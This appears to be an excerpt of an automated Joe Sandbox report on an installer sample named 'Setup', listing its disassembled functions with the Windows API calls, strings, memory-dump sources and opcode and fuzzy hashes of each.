Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.2208713460.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2208687940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208746197.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208788841.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208992070.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

